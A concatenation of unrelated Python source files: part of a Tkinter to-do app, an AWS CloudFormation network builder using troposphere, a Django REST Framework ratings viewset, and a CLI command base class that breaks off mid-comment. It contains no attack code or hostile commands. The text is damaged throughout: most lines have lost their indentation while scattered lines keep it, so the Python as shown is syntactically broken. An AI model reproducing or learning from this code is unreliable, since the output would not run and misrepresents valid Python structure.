remote_id = sqlite.get_remote_id(self.id)
mysql.delete_task(remote_id)
sqlite.delete_task(self.id)
self.destroy()
def edit_task(self, e):
data = {
'title': StringVar(),
'message': StringVar(),
'date': StringVar(),
'time': StringVar()
}
data['title'].set(self.title)
data['message'].set(self.message)
if self.datetime == '':
data['date'].set('')
data['time'].set('')
else:
data['date'].set(self.datetime.split()[0])
data['time'].set(self.datetime.split()[1][:-3])
self.delete_task(e)
self.window.new_task(self.task_type, data, 'Edit Task')
def open_link(self, event, link):
webbrowser.open_new(link)
class App(Frame):
"""docstring for App"""
def paste(self):
"""Override Paste Shortcut"""
self.entry.event_generate('<Control-v>')
def cut(self):
"""Override Cut Shortcut"""
self.entry.event_generate('<Control-x>')
def copy(self):
"""Override Copy Shortcut"""
self.entry.event_generate('<Control-c>')
def save(self):
"""Save User's API Key in Setting"""
api = Api()
api.set_api(self.api_entry.get())
self.s.destroy()
self.clear_frame()
def setting(self):
"""Create Setting Window"""
api = Api()
val = StringVar()
val.set(api.get_api())
self.s = Toplevel(self, padx=10, pady=10)
self.s.title("Update API Key")
self.s.resizable(0, 0)
self.api_label = Label(self.s, text="API Key")
self.api_label.grid(row=0, column=0, sticky=W, ipady=10)
self.api_entry = Entry(self.s, textvariable=val, width=40)
self.api_entry.grid(row=0, column=1, columnspan=2, sticky=W + E, ipady=3)
self.save_btn = Button(self.s, text="Save", padx=10, pady=5, command=self.save)
self.save_btn.grid(row=1, column=0, columnspan=3, sticky=W + E, pady=5)
def new_task(self, task_type, values=dict(), btn='Add Task'):
"""
        Create the "Add a task" window
        @param task_type Type of the task to create
        @param values A dict of task data (title, message, date, time)
        @param btn Text displayed on the button
"""
        if values == {}:
            values = {}  # build fresh defaults; do not mutate the shared default dict
            values['title'] = StringVar()
            values['message'] = StringVar()
values['date'] = StringVar()
values['date'].set('2014-10-30')
values['time'] = StringVar()
values['time'].set('13:37')
self.task_type = task_type
self.t = Toplevel(self, padx=10, pady=10)
self.t.title("Add a task")
self.t.resizable(0, 0)
self.title_label = Label(self.t, text="Title")
self.title_label.grid(row=0, column=0, sticky=W, ipady=10)
self.title = Entry(self.t, textvariable=values['title'])
self.title.grid(row=0, column=1, columnspan=2, sticky=W + E, ipady=3)
self.message_label = Label(self.t, text="Message")
self.message_label.grid(row=1, column=0, sticky=W, ipady=10)
self.message = Entry(self.t, textvariable=values['message'])
self.message.grid(row=1, column=1, columnspan=2, sticky=W + E, ipady=3)
self.datetime_label = Label(self.t, text="Datetime")
self.datetime_label.grid(row=2, column=0, sticky=W, ipady=10)
self.datetime_date = Entry(self.t, textvariable=values['date'])
self.datetime_date.grid(row=2, column=1, sticky=W, ipady=3)
self.datetime_time = Entry(self.t, textvariable=values['time'])
self.datetime_time.grid(row=2, column=2, sticky=W, ipady=3)
self.l = Button(self.t, padx=10, pady=5)
self.l["text"] = btn
self.l["command"] = self.get_new_task
self.l.grid(row=3, columnspan=3, sticky=N + E + W + S, pady=5)
def get_new_task(self):
"""Get data from "Add a task" Window and add task"""
title = self.title.get()
message = self.message.get()
task_type = self.task_type
date = self.datetime_date.get()
time = self.datetime_time.get()
self.add_task(title, message, task_type, date, time)
self.t.destroy()
def create_widget(self):
"""Create main window program"""
self.row = 0
self.columnconfigure(0, pad=0)
self.columnconfigure(1, pad=0)
self.columnconfigure(2, pad=0)
self.columnconfigure(3, pad=0)
self.new_text = Button(self.frame, padx=25, pady=10, bg="white", borderwidth=0)
self.new_text["text"] = "Text"
self.new_text["command"] = lambda: self.new_task("text")
self.new_text.bind("<Enter>", lambda event, h=self.new_text: h.configure(bg="#cccccc"))
self.new_text.bind("<Leave>", lambda event, h=self.new_text: h.configure(bg="#ffffff"))
self.new_text.grid(row=0, sticky=N + S + E + W, column=0, pady=(0, 2))
self.new_list = Button(self.frame, padx=25, pady=10, bg="white", borderwidth=0)
self.new_list["text"] = "List"
self.new_list["command"] = lambda: self.new_task("list")
self.new_list.bind("<Enter>", lambda event, h=self.new_list: h.configure(bg="#cccccc"))
self.new_list.bind("<Leave>", lambda event, h=self.new_list: h.configure(bg="#ffffff"))
self.new_list.grid(row=0, sticky=N + S + E + W, column=1, pady=(0, 2))
self.new_link = Button(self.frame, padx=25, pady=10, bg="white", borderwidth=0)
self.new_link["text"] = "Link"
self.new_link["command"] = lambda: self.new_task("link")
self.new_link.bind("<Enter>", lambda event, h=self.new_link: h.configure(bg="#cccccc"))
self.new_link.bind("<Leave>", lambda event, h=self.new_link: h.configure(bg="#ffffff"))
self.new_link.grid(row=0, sticky=N + S + E + W, column=2, pady=(0, 2))
self.new_file = Button(self.frame, padx=25, pady=10, bg="white", borderwidth=0)
self.new_file["text"] = "File"
self.new_file["command"] = lambda: self.new_task("file")
self.new_file.bind("<Enter>", lambda event, h=self.new_file: h.configure(bg="#cccccc"))
self.new_file.bind("<Leave>", lambda event, h=self.new_file: h.configure(bg="#ffffff"))
self.new_file.grid(row=0, sticky=N + S + E + W, column=3, pady=(0, 2))
self.pack()
self.get_task()
def clear_frame(self):
"""Clear main window and refresh task"""
for child in self.frame.winfo_children():
child.destroy()
self.create_widget()
def create_frame(self, title, message, task_type, datetime, id=''):
"""Create Task Frame on main window"""
self.row += 1
Task(self.frame, id, title, message, task_type, datetime, self).grid(row=self.row, columnspan=4, sticky=W + E, pady=(0, 2))
def get_task(self):
"""Get All User's Task"""
api = Api()
self.api = api.get_api()
for row in self.sqlite.get_task(self.api):
print row
self.create_frame(row[1], row[2], row[3], row[4], id=row[0])
print '---------------------------------------------------------------'
def add_task(self, title, message, task_type, date, time):
"""Add task to database"""
print title, message, task_type, date, time
print '---------------------------------------------------------------'
self.data = {
'api': self.api,
'title': title,
'message': message,
'task_type': task_type,
}
if (date == "" and time == "") or (date == '2014-10-30' and time == '13:37'):
self.data['time'] = ""
self.data['remote_id'] = 0
else:
self.data['time'] = date + ' ' + time + ':00'
self.data['remote_id'] = self.mysql.insert_task(self.data)
task_id = self.sqlite.insert_task(self.data)
self.create_frame(self.data['title'], self.data['message'], self.data['task_type'], self.data['time'], task_id)
def OnFrameConfigure(self, event):
'''Reset the scroll region to encompass the inner frame'''
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def __init__(self, master=None):
"""create database connection and init App frame and Canvas"""
self.mysql = MySQL()
self.sqlite = SQLite('db.db')
api = Api()
self.api = api.get_api()
Frame.__init__(self, master)
Style().configure('.', font=('Arial', 10))
self.canvas = Canvas(master, borderwidth=0, background="white", width=320)
self.frame = Frame(self.canvas, background="#cccccc")
self.vsb = Scrollbar(master, orient="vertical", command=self.canvas.yview)
self.canvas.configure(yscrollcommand=self.vsb.set)
self.vsb.pack(side="right", fill="y")
self.canvas.pack(side="left", fill="both")
self.canvas.create_window((0, 0), window=self.frame, anchor=NW)
self.frame.bind("<Configure>", self.OnFrameConfigure)
self.menubar = Menu(self.master)
self.master.config(menu=self.menubar)
filemenu = Menu(self.menubar, tearoff=0)
filemenu.add_command(label="Setting", command=self.setting)
filemenu.add_command(label="Quit", command=quit)
self.menubar.add_cascade(label="File", menu=filemenu)
self.create_widget()
def main():
"""init program"""
root = Tk()
root.resizable(width=FALSE, height=FALSE)
root.geometry("320x600+150+150")
root.title('To-do Bullet (Dev.)')
app = App(master=None)
app.mainloop()
root.destroy()
if __name__ == '__main__':
    main()
|
|
#!/usr/bin/python3
from amazonia.classes.hosted_zone import HostedZone
from amazonia.classes.single_instance import SingleInstance
from amazonia.classes.single_instance_config import SingleInstanceConfig
from amazonia.classes.sns import SNS
from amazonia.classes.subnet import Subnet
from amazonia.classes.util import get_cf_friendly_name
from troposphere import Ref, Template, ec2, Tags, Join, GetAtt
from troposphere.ec2 import EIP, NatGateway
class Network(object):
def __init__(self, keypair, availability_zones, vpc_cidr, home_cidrs, public_cidr, jump_image_id,
jump_instance_type, nat_image_id, nat_instance_type, public_hosted_zone_name, private_hosted_zone_name,
iam_instance_profile_arn, owner_emails, nat_highly_available, ec2_scheduled_shutdown, owner):
"""
Create a vpc, nat, jumphost, internet gateway, public/private route tables, public/private subnets
and collection of Amazonia units
AWS CloudFormation -
http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-instance.html
Troposphere - https://github.com/cloudtools/troposphere/blob/master/troposphere/ec2.py
:param keypair: ssh keypair to be used throughout stack
:param availability_zones: availability zones to use
:param vpc_cidr: cidr pattern for vpc
:param home_cidrs: a list of tuple objects of 'title'(0) and 'ip'(1) to be used
to create ingress rules for ssh to jumpboxes from home/office/company premises
:param public_cidr: a cidr to be treated as a public location. (eg 0.0.0.0/0)
:param jump_image_id: AMI for jumphost
:param jump_instance_type: instance type for jumphost
:param nat_image_id: AMI for nat
:param nat_instance_type: instance type for nat
:param public_hosted_zone_name: A string containing the name of the Route 53 hosted zone to create public record
sets in.
:param private_hosted_zone_name: name of private hosted zone to create
:param iam_instance_profile_arn: the ARN for an IAM instance profile that enables cloudtrail access for logging
:param owner_emails: a list of emails for owners of this stack. Used for alerting.
:param nat_highly_available: True/False for whether or not to use a series of NAT gateways or a single NAT
        :param ec2_scheduled_shutdown: True/False for whether to schedule shutdown for EC2 instances outside work hours
        :param owner: owner identifier for this stack, passed through to the instances created
"""
super(Network, self).__init__()
# set parameters
self.keypair = keypair
self.availability_zones = availability_zones
self.vpc_cidr = vpc_cidr
self.home_cidrs = home_cidrs
self.public_cidr = public_cidr
self.public_hosted_zone_name = public_hosted_zone_name
self.private_hosted_zone_name = private_hosted_zone_name
self.jump_image_id = jump_image_id
self.jump_instance_type = jump_instance_type
self.nat_image_id = nat_image_id
self.nat_instance_type = nat_instance_type
self.owner_emails = owner_emails if owner_emails else []
self.nat_highly_available = nat_highly_available
self.iam_instance_profile_arn = iam_instance_profile_arn
self.ec2_scheduled_shutdown = ec2_scheduled_shutdown
self.owner = owner
# initialize object references
self.template = Template()
self.private_subnets = []
self.public_subnets = []
self.public_subnet_mapping = {}
self.vpc = None
self.private_hosted_zone = None
self.internet_gateway = None
self.gateway_attachment = None
self.public_route_table = None
self.private_route_tables = {}
self.nat = None
self.nat_gateways = []
self.jump = None
self.private_route = None
self.public_route = None
self.sns_topic = None
# Add VPC and Internet Gateway with Attachment
vpc_name = 'Vpc'
self.vpc = Ref(self.template.add_resource(
ec2.VPC(
vpc_name,
CidrBlock=self.vpc_cidr['cidr'],
EnableDnsSupport='true',
EnableDnsHostnames='true',
Tags=Tags(
Name=Join('', [Ref('AWS::StackName'), '-', vpc_name])
)
)))
self.private_hosted_zone = HostedZone(self.template, self.private_hosted_zone_name, vpcs=[self.vpc])
ig_name = 'Ig'
self.internet_gateway = self.template.add_resource(
ec2.InternetGateway(ig_name,
Tags=Tags(Name=Join('', [Ref('AWS::StackName'), '-', ig_name])),
DependsOn=vpc_name))
self.gateway_attachment = self.template.add_resource(
ec2.VPCGatewayAttachment(self.internet_gateway.title + 'Atch',
VpcId=self.vpc,
InternetGatewayId=Ref(self.internet_gateway),
DependsOn=self.internet_gateway.title))
# Add Public Route Table
public_rt_name = 'PubRouteTable'
self.public_route_table = self.template.add_resource(
ec2.RouteTable(public_rt_name, VpcId=self.vpc,
Tags=Tags(Name=Join('', [Ref('AWS::StackName'), '-', public_rt_name]))))
# Add Public and Private Subnets and Private Route Table
for az in self.availability_zones:
private_rt_name = get_cf_friendly_name(az) + 'PriRouteTable'
private_route_table = self.template.add_resource(
ec2.RouteTable(private_rt_name, VpcId=self.vpc,
Tags=Tags(Name=Join('', [Ref('AWS::StackName'), '-', private_rt_name]))))
self.private_route_tables[az] = private_route_table
self.private_subnets.append(Subnet(template=self.template,
route_table=private_route_table,
az=az,
vpc=self.vpc,
is_public=False,
cidr=self.generate_subnet_cidr(is_public=False)).trop_subnet)
public_subnet = Subnet(template=self.template,
route_table=self.public_route_table,
az=az,
vpc=self.vpc,
is_public=True,
cidr=self.generate_subnet_cidr(is_public=True)).trop_subnet
self.public_subnets.append(public_subnet)
self.public_subnet_mapping[az] = Ref(public_subnet)
self.sns_topic = SNS(self.template)
for email in self.owner_emails:
self.sns_topic.add_subscription(email, 'email')
jump_config = SingleInstanceConfig(
keypair=self.keypair,
si_image_id=self.jump_image_id,
si_instance_type=self.jump_instance_type,
subnet=self.public_subnet_mapping[availability_zones[0]],
vpc=self.vpc,
public_hosted_zone_name=self.public_hosted_zone_name,
instance_dependencies=self.gateway_attachment.title,
iam_instance_profile_arn=self.iam_instance_profile_arn,
is_nat=False,
sns_topic=self.sns_topic,
availability_zone=availability_zones[0],
ec2_scheduled_shutdown=self.ec2_scheduled_shutdown,
owner=self.owner
)
# Add Jumpbox and NAT and associated security group ingress and egress rules
self.jump = SingleInstance(
title='Jump',
template=self.template,
single_instance_config=jump_config
)
        for home_cidr in self.home_cidrs:
            self.jump.add_ingress(sender=home_cidr, port='22')
self.jump.add_egress(receiver={'name': 'PublicIp', 'cidr': '0.0.0.0/0'}, port='-1')
if self.nat_highly_available:
for public_subnet in self.public_subnets:
az = public_subnet.AvailabilityZone
ip_address = self.template.add_resource(
EIP(get_cf_friendly_name(az) + 'NatGwEip',
DependsOn=self.gateway_attachment.title,
Domain='vpc'
))
nat_gateway = self.template.add_resource(NatGateway(get_cf_friendly_name(az) + 'NatGw',
AllocationId=GetAtt(ip_address, 'AllocationId'),
SubnetId=Ref(public_subnet),
DependsOn=self.gateway_attachment.title
))
self.nat_gateways.append(nat_gateway)
self.template.add_resource(ec2.Route(get_cf_friendly_name(az) + 'PriRoute',
NatGatewayId=Ref(nat_gateway),
RouteTableId=Ref(self.private_route_tables[az]),
DestinationCidrBlock=self.public_cidr['cidr'],
DependsOn=self.gateway_attachment.title))
else:
nat_config = SingleInstanceConfig(
keypair=self.keypair,
si_image_id=self.nat_image_id,
si_instance_type=self.nat_instance_type,
subnet=self.public_subnet_mapping[availability_zones[0]],
vpc=self.vpc,
is_nat=True,
instance_dependencies=self.gateway_attachment.title,
iam_instance_profile_arn=self.iam_instance_profile_arn,
public_hosted_zone_name=None,
sns_topic=self.sns_topic,
availability_zone=availability_zones[0],
ec2_scheduled_shutdown=self.ec2_scheduled_shutdown,
owner=self.owner
)
self.nat = SingleInstance(
title='Nat',
template=self.template,
single_instance_config=nat_config
)
self.nat.add_egress(receiver=self.public_cidr, port='-1')
self.nat.add_ingress(sender=self.vpc_cidr, port='-1')
for az in self.availability_zones:
self.template.add_resource(ec2.Route(get_cf_friendly_name(az) + 'PriRoute',
InstanceId=Ref(self.nat.single),
RouteTableId=Ref(self.private_route_tables[az]),
DestinationCidrBlock=self.public_cidr['cidr'],
DependsOn=self.gateway_attachment.title))
# Add Public Route
self.public_route = self.template.add_resource(ec2.Route('PubRoute',
GatewayId=Ref(self.internet_gateway),
RouteTableId=Ref(self.public_route_table),
DestinationCidrBlock=self.public_cidr['cidr'],
DependsOn=self.gateway_attachment.title))
def generate_subnet_cidr(self, is_public):
"""
        Helper to derive /24 ('Class C') subnet CIDRs from the VPC CIDR
:param is_public: boolean for public or private subnet determined by route table
:return: Subnet CIDR based on Public or Private and previous subnets created e.g. 10.0.2.0/24 or 10.0.101.0/24
"""
# 3rd Octet: Obtain length of pub or pri subnet list
octet_3 = len(self.public_subnets) if is_public else len(self.private_subnets) + 100
cidr_split = self.vpc_cidr['cidr'].split('.') # separate VPC CIDR for renaming
cidr_split[2] = str(octet_3) # set 3rd octet based on public or private
cidr_last = cidr_split[3].split('/') # split last group to change subnet mask
cidr_last[1] = '24' # set subnet mask
cidr_split[3] = '/'.join(cidr_last) # join last group for subnet mask
return '.'.join(cidr_split)
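# A minimal usage sketch of the CIDR numbering above, assuming a VPC CIDR of
# {'cidr': '10.0.0.0/16'} (illustrative value, not a default). Only the third
# octet and the /24 mask are rewritten; the counts of already-created subnets
# drive the numbering, with private subnets offset by 100:
#
#     network.generate_subnet_cidr(is_public=True)   # -> '10.0.0.0/24' on the first call
#     network.generate_subnet_cidr(is_public=False)  # -> '10.0.100.0/24' on the first call
#
# Subsequent availability zones therefore get 10.0.1.0/24, 10.0.101.0/24, and so on.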
|
|
from django.db.models import Prefetch, Q
from django.utils.encoding import force_text
from rest_framework import serializers
from rest_framework.decorators import action
from rest_framework.exceptions import (
NotAuthenticated, ParseError, PermissionDenied)
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.status import HTTP_202_ACCEPTED
from rest_framework.viewsets import ModelViewSet
from olympia import amo
from olympia.access import acl
from olympia.addons.views import AddonChildMixin
from olympia.api.pagination import OneOrZeroPageNumberPagination
from olympia.api.permissions import (
AllowAddonAuthor, AllowIfPublic, AllowNotOwner, AllowOwner,
AllowRelatedObjectPermissions, AnyOf, ByHttpMethod, GroupPermission)
from olympia.api.throttling import GranularUserRateThrottle
from olympia.api.utils import is_gate_active
from .models import GroupedRating, Rating, RatingFlag
from .permissions import CanDeleteRatingPermission
from .serializers import (
RatingFlagSerializer, RatingSerializer, RatingSerializerReply)
class RatingThrottle(GranularUserRateThrottle):
rate = '1/minute'
scope = 'user_rating'
def allow_request(self, request, view):
if request.method.lower() == 'post':
return super(RatingThrottle, self).allow_request(request, view)
else:
return True
class RatingReplyThrottle(RatingThrottle):
rate = '1/5second'
class RatingViewSet(AddonChildMixin, ModelViewSet):
serializer_class = RatingSerializer
permission_classes = [
ByHttpMethod({
'get': AllowAny,
'head': AllowAny,
'options': AllowAny, # Needed for CORS.
# Deletion requires a specific permission check.
'delete': CanDeleteRatingPermission,
# To post a rating you just need to be authenticated.
'post': IsAuthenticated,
# To edit a rating you need to be the author or be an admin.
'patch': AnyOf(AllowOwner, GroupPermission(
amo.permissions.ADDONS_EDIT)),
# Implementing PUT would be a little incoherent as we don't want to
# allow users to change `version` but require it at creation time.
# So only PATCH is allowed for editing.
}),
]
reply_permission_classes = [AnyOf(
GroupPermission(amo.permissions.ADDONS_EDIT),
AllowRelatedObjectPermissions('addon', [AllowAddonAuthor]),
)]
reply_serializer_class = RatingSerializerReply
flag_permission_classes = [AllowNotOwner]
throttle_classes = (RatingThrottle,)
def set_addon_object_from_rating(self, rating):
"""Set addon object on the instance from a rating object."""
# At this point it's likely we didn't have an addon in the request, so
# if we went through get_addon_object() before it's going to be set
# to None already. We delete the addon_object property cache and set
# addon_pk in kwargs to force get_addon_object() to reset
# self.addon_object.
del self.addon_object
self.kwargs['addon_pk'] = str(rating.addon.pk)
return self.get_addon_object()
def get_addon_object(self):
"""Return addon object associated with the request, or None if not
relevant.
Will also fire permission checks on the addon object when it's loaded.
"""
if hasattr(self, 'addon_object'):
return self.addon_object
if 'addon_pk' not in self.kwargs:
self.kwargs['addon_pk'] = (
self.request.data.get('addon') or
self.request.GET.get('addon'))
if not self.kwargs['addon_pk']:
# If we don't have an addon object, set it as None on the instance
# and return immediately, that's fine.
self.addon_object = None
return
else:
# AddonViewSet.get_lookup_field() expects a string.
self.kwargs['addon_pk'] = force_text(self.kwargs['addon_pk'])
# When loading the add-on, pass a specific permission class - the
        # default from AddonViewSet is too restrictive: we are not modifying
        # the add-on itself, so we don't need all the permission checks it does.
return super(RatingViewSet, self).get_addon_object(
permission_classes=[AllowIfPublic])
def should_include_flags(self):
if not hasattr(self, '_should_include_flags'):
request = self.request
self._should_include_flags = (
'show_flags_for' in request.GET and
not is_gate_active(request, 'del-ratings-flags')
)
if self._should_include_flags:
# Check the parameter was sent correctly
try:
show_flags_for = (
serializers.IntegerField().to_internal_value(
request.GET['show_flags_for']))
if show_flags_for != request.user.pk:
raise serializers.ValidationError
except serializers.ValidationError:
raise ParseError(
'show_flags_for parameter value should be equal to '
'the user id of the authenticated user')
return self._should_include_flags
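    # Illustrative request for the flag-visibility check above (the id and URL
    # prefix are assumptions, routing is defined elsewhere):
    #   GET /ratings/?addon=1865&show_flags_for=42
    # When the 'del-ratings-flags' gate is active the parameter is ignored;
    # otherwise its value must equal the authenticated user's pk, or a
    # ParseError is raised.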
def check_permissions(self, request):
"""Perform permission checks.
        The regular DRF permission checks are made, but before that, if an
        addon was requested, verify that it exists and is public and listed,
        via the AllowIfPublic permission that get_addon_object() uses."""
self.get_addon_object()
# Proceed with the regular permission checks.
return super(RatingViewSet, self).check_permissions(request)
def get_serializer(self, *args, **kwargs):
if self.action in ('partial_update', 'update'):
instance = args[0]
if instance.reply_to is not None:
self.rating_object = instance.reply_to
self.serializer_class = self.reply_serializer_class
return super(RatingViewSet, self).get_serializer(*args, **kwargs)
def filter_queryset(self, qs):
if self.action == 'list':
addon_identifier = self.request.GET.get('addon')
user_identifier = self.request.GET.get('user')
version_identifier = self.request.GET.get('version')
score_filter = (
self.request.GET.get('score')
if is_gate_active(self.request, 'ratings-score-filter')
else None)
exclude_ratings = self.request.GET.get('exclude_ratings')
if addon_identifier:
qs = qs.filter(addon=self.get_addon_object())
if user_identifier:
try:
user_identifier = int(user_identifier)
except ValueError:
raise ParseError('user parameter should be an integer.')
qs = qs.filter(user=user_identifier)
if version_identifier:
try:
version_identifier = int(version_identifier)
except ValueError:
raise ParseError('version parameter should be an integer.')
qs = qs.filter(version=version_identifier)
elif addon_identifier:
# When filtering on addon but not on version, only return the
# latest rating posted by each user.
qs = qs.filter(is_latest=True)
if not addon_identifier and not user_identifier:
# Don't allow listing ratings without filtering by add-on or
# user.
raise ParseError('Need an addon or user parameter')
if user_identifier and addon_identifier and version_identifier:
# When user, addon and version identifiers are set, we are
# effectively only looking for one or zero objects. Fake
# pagination in that case, avoiding all count() calls and
# therefore related cache-machine invalidation issues. Needed
# because the frontend wants to call this before and after
# having posted a new rating, and needs accurate results.
self.pagination_class = OneOrZeroPageNumberPagination
if score_filter:
try:
scores = [int(score) for score in score_filter.split(',')]
except ValueError:
raise ParseError(
'score parameter should be an integer or a list of '
'integers (separated by a comma).')
qs = qs.filter(rating__in=scores)
if exclude_ratings:
try:
exclude_ratings = [
int(rating) for rating in exclude_ratings.split(',')
]
except ValueError:
raise ParseError('exclude_ratings parameter should be an '
'integer or a list of integers '
'(separated by a comma).')
qs = qs.exclude(pk__in=exclude_ratings)
return super(RatingViewSet, self).filter_queryset(qs)
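    # Sketch of the query-string combinations the list action supports (ids are
    # illustrative; the URL prefix depends on routing defined elsewhere):
    #   ?addon=<id>                        -> latest rating per user for that add-on
    #   ?addon=<id>&user=<id>              -> that user's latest rating for the add-on
    #   ?addon=<id>&user=<id>&version=<id> -> at most one result, fake pagination
    #   ?addon=<id>&score=4,5              -> only honoured behind the 'ratings-score-filter' gate
    #   ?user=<id>&exclude_ratings=1,2     -> all of that user's ratings minus specific pks
    # Listing without at least an addon or a user parameter raises ParseError.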
def get_paginated_response(self, data):
request = self.request
extra_data = {}
if 'show_grouped_ratings' in request.GET:
try:
show_grouped_ratings = (
serializers.BooleanField().to_internal_value(
request.GET['show_grouped_ratings']))
except serializers.ValidationError:
raise ParseError(
'show_grouped_ratings parameter should be a boolean')
if show_grouped_ratings and self.get_addon_object():
extra_data['grouped_ratings'] = dict(GroupedRating.get(
self.addon_object.id))
if ('show_permissions_for' in request.GET and
is_gate_active(self.request, 'ratings-can_reply')):
if 'addon' not in request.GET:
raise ParseError(
'show_permissions_for parameter is only valid if the '
'addon parameter is also present')
try:
show_permissions_for = (
serializers.IntegerField().to_internal_value(
request.GET['show_permissions_for']))
if show_permissions_for != request.user.pk:
raise serializers.ValidationError
except serializers.ValidationError:
raise ParseError(
'show_permissions_for parameter value should be equal to '
'the user id of the authenticated user')
extra_data['can_reply'] = (
self.check_can_reply_permission_for_ratings_list())
# Call this here so the validation checks on the `show_flags_for` are
# carried out even when there are no results to serialize.
self.should_include_flags()
response = super(RatingViewSet, self).get_paginated_response(data)
if extra_data:
response.data.update(extra_data)
return response
def check_can_reply_permission_for_ratings_list(self):
"""Check whether or not the current request contains an user that can
reply to ratings we're about to return.
Used to populate the `can_reply` property in ratings list, when an
addon is passed."""
# Clone the current viewset, but change permission_classes.
viewset = self.__class__(**self.__dict__)
viewset.permission_classes = self.reply_permission_classes
# Create a fake rating with the addon object attached, to be passed to
# check_object_permissions().
dummy_rating = Rating(addon=self.get_addon_object())
try:
viewset.check_permissions(self.request)
viewset.check_object_permissions(self.request, dummy_rating)
return True
except (PermissionDenied, NotAuthenticated):
return False
def get_queryset(self):
requested = self.request.GET.get('filter', '').split(',')
has_addons_edit = acl.action_allowed(self.request,
amo.permissions.ADDONS_EDIT)
# Add this as a property of the view, because we need to pass down the
        # information to the serializer to show/hide deleted replies.
if not hasattr(self, 'should_access_deleted_ratings'):
self.should_access_deleted_ratings = (
('with_deleted' in requested or self.action != 'list') and
self.request.user.is_authenticated and
has_addons_edit)
should_access_only_top_level_ratings = (
self.action == 'list' and self.get_addon_object())
if self.should_access_deleted_ratings:
# For admins or add-on authors replying. When listing, we include
            # deleted ratings but still filter out replies, because they'll
# be in the serializer anyway. For other actions, we simply remove
# any filtering, allowing them to access any rating out of the box
# with no extra parameter needed.
if self.action == 'list':
queryset = Rating.unfiltered.filter(reply_to__isnull=True)
else:
queryset = Rating.unfiltered.all()
elif should_access_only_top_level_ratings:
# When listing add-on ratings, exclude replies, they'll be
# included during serialization as children of the relevant
# ratings instead.
queryset = Rating.without_replies.all()
else:
queryset = Rating.objects.all()
# Filter out empty ratings if specified.
        # Should the user's own empty ratings be filtered back in?
if 'with_yours' in requested and self.request.user.is_authenticated:
user_filter = Q(user=self.request.user.pk)
else:
user_filter = Q()
# Apply the filter(s)
if 'without_empty_body' in requested:
queryset = queryset.filter(~Q(body=None) | user_filter)
# The serializer needs reply, version and user. We don't need much
# for version and user, so we can make joins with select_related(),
# but for replies additional queries will be made for translations
# anyway so we're better off using prefetch_related() to make a
# separate query to fetch them all.
queryset = queryset.select_related('version', 'user')
replies_qs = Rating.unfiltered.select_related('user')
return queryset.prefetch_related(
Prefetch('reply', queryset=replies_qs))
@action(
detail=True, methods=['post'],
permission_classes=reply_permission_classes,
serializer_class=reply_serializer_class,
throttle_classes=[RatingReplyThrottle])
def reply(self, *args, **kwargs):
# A reply is just like a regular post, except that we set the reply
# FK to the current rating object and only allow add-on authors/admins.
# Call get_object() to trigger 404 if it does not exist.
self.rating_object = self.get_object()
self.set_addon_object_from_rating(self.rating_object)
if Rating.unfiltered.filter(reply_to=self.rating_object).exists():
# A reply already exists, just edit it.
# We set should_access_deleted_ratings so that it works even if
# the reply has been deleted.
self.kwargs['pk'] = kwargs['pk'] = self.rating_object.reply.pk
self.should_access_deleted_ratings = True
return self.partial_update(*args, **kwargs)
return self.create(*args, **kwargs)
@action(
detail=True, methods=['post'],
permission_classes=flag_permission_classes,
throttle_classes=[])
def flag(self, request, *args, **kwargs):
# We load the add-on object from the rating to trigger permission
# checks.
self.rating_object = self.get_object()
self.set_addon_object_from_rating(self.rating_object)
try:
flag_instance = RatingFlag.objects.get(
rating=self.rating_object, user=self.request.user)
except RatingFlag.DoesNotExist:
flag_instance = None
if flag_instance is None:
serializer = RatingFlagSerializer(
data=request.data, context=self.get_serializer_context())
else:
serializer = RatingFlagSerializer(
flag_instance, data=request.data, partial=False,
context=self.get_serializer_context())
serializer.is_valid(raise_exception=True)
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(
serializer.data, status=HTTP_202_ACCEPTED, headers=headers)
def perform_destroy(self, instance):
instance.delete(user_responsible=self.request.user)
|
|
from __future__ import print_function
import hashlib
import logging
import stat
from argparse import ArgumentParser
import posixpath
import requests
import os
import shutil
from . import utils, repo
from .compat import ConfigParser, urlsplit, urljoin, FileExistsException
logger = logging.getLogger(__name__)
def get_input(): # pragma: no cover (this is always mocked out)
return input()
class Base(object):
"""
The base command object
:var description: The brief description of the command
:var sub_commands: A dictionary mapping names to sub commands. Each value should be a class inheriting from Base.
"""
description = None
sub_commands = {}
def __init__(self, name=None):
"""
Creates the command
:param name: The name the command is registered to
"""
self.name = name
self._arg_parser = None
@property
def sub_parser_dest_name(self):
"""
        The name of the argument under which the chosen sub command's name is stored
"""
if self.name:
return u'{0}__sub_command'.format(self.name)
return 'sub_command'
@property
def arg_parser(self):
if not self._arg_parser:
self._arg_parser = ArgumentParser(self.get_description())
self.add_args(self._arg_parser)
self.register_sub_commands(self._arg_parser)
return self._arg_parser
def parse_args(self):
"""
Parses the command line arguments
:return: The arguments taken from the command line
"""
return self.arg_parser.parse_args()
def add_args(self, parser):
"""
Adds arguments to the argument parser. This is used to modify which arguments are processed by the command.
For a full description of the argument parser see https://docs.python.org/3/library/argparse.html.
:param parser: The argument parser object
"""
pass
def register_sub_commands(self, parser):
"""
Add any sub commands to the argument parser.
:param parser: The argument parser object
"""
sub_commands = self.get_sub_commands()
if sub_commands:
sub_parsers = parser.add_subparsers(dest=self.sub_parser_dest_name)
for name, cls in sub_commands.items():
cmd = cls(name)
sub_parser = sub_parsers.add_parser(name, help=cmd.get_description(), description=cmd.get_description())
cmd.add_args(sub_parser)
cmd.register_sub_commands(sub_parser)
def get_sub_commands(self):
"""
Gets a dictionary mapping names to sub commands. Values should be classes inheriting from Base.
        :return: The dictionary of sub commands.
"""
return self.sub_commands
def get_description(self):
"""
Gets the description of the command
"""
return self.description
def action(self, args):
"""
Performs the action of the command.
This should be implemented by sub classes.
:param args: The arguments parsed from parse_args
:return: The status code of the action (0 on success)
"""
self.arg_parser.print_help()
return 1
def run(self):
"""
Runs the command passing in the parsed arguments.
:return: The status code of the action (0 on success)
"""
args = self.parse_args()
sub_command_name = getattr(args, self.sub_parser_dest_name, None)
if sub_command_name:
return self.get_sub_commands()[sub_command_name]().action(args)
return self.action(args)
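# A minimal sketch of how a command is built on top of Base (the names below
# are illustrative and not part of this package):
#
#     class Hello(Base):
#         description = 'Says hello'
#
#         def add_args(self, parser):
#             parser.add_argument('name')
#
#         def action(self, args):
#             print('hello {0}'.format(args.name))
#             return 0
#
# It would then be registered on a parent command via sub_commands, e.g.
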